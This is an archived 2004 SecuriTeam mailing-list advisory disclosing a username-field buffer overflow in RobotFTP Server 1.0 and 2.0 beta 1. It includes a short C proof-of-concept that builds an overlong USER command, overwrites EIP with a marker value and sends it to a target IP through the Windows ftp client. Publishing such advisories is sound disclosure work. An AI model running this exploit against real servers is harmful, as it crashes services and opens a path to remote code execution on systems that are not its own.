[NT] RobotFTP Server USER Buffer Overflow

• Previous message: SecuriTeam: "[UNIX] Samba 3.x Under Default Kernel 2.6.x Allows Local Root Compromise"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 17 Feb 2004 17:44:19 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  RobotFTP Server USER Buffer Overflow
------------------------------------------------------------------------

SUMMARY

 <http://http://www.robotftp.com/> RobotFTP Server is an "FTP server that
will transform any windows computer into an FTP site and enable
distribution of files to co-workers or friends. RobotFTP Server is
extremely easy to setup and configure. You can create password protected
or anonymous accounts, specify folders and files that are accessible for
each account, and monitor activities of connected users." A vulnerability
in the product allows remote attackers to cause RobotFTP to crash, while
executing arbitrary code.

DETAILS

Vulnerable Systems:
 * RobotFTP version 1.0
 * RobotFTP version 2.0 beta 1

A buffer overflow vulnerability in RobotFTP server in the username field
that allows remote command execution.

Exploit:
/******************************
this is example code for the vulnerability. It uses the windows ftp client
to connect to a server
******************************/
#include < stdio.h>

char buffer[2500];
char cmd[50];

int main(int argc, char *argv[])
{
  FILE *evil;

  if(argv[1] == NULL)
  {
    printf("Usage: %s [IP]\n\n",argv[0]);
    return 0;
  }

  memset(buffer,0x41,47);
  memcpy(buffer+47,"\r\n",2);
  memcpy(buffer+49,"crash",5);
  memcpy(buffer+54,"\r\n",2);
  memcpy(buffer+56,"USER ",5);
  memset(buffer+61,0x41,1989);
  memset(buffer+61+1989,0x58,4); // < < overwrites the eip with XXXX
  memcpy(buffer+65+1989,"\r\n",2);

  sprintf(cmd,"ftp -s:ftp.txt %s",argv[1]);

  if((evil = fopen("ftp.txt", "a+")) != NULL)
  {
    fputs(buffer, evil);
    fclose(evil);
    printf("- file written!\n");
  }
  else
  {
  fprintf(stderr, "ERROR: couldn't open ftp.txt!\n");
  exit(1);
  }
  system(cmd);

}
/*******************************/

ADDITIONAL INFORMATION

The information has been provided by <mailto:nothing.king@firemail.de>
gsicht gsicht.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[UNIX] Samba 3.x Under Default Kernel 2.6.x Allows Local Root Compromise"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]